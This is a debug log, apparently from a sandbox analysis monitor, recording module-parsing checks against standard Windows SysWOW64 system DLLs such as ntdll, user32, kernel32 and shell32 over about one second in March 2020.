2020-03-24 10:16:36,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,789 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:36,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:36,805 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:36,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:36,821 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:36,821 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:36,821 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:36,836 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:36,836 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:36,836 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:36,852 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:36,852 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:36,852 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,884 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,961 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,961 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,961 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:36,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:36,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:37,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:37,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:37,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:37,039 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:37,039 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:37,039 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:37,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:37,055 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:37,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:37,071 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,071 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,086 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,086 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,086 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,118 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,118 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,118 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,196 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,196 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,196 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,243 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,257 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,321 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,321 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,321 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,382 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,507 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,507 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,507 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,617 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,617 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,632 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,632 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,632 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,648 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,678 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
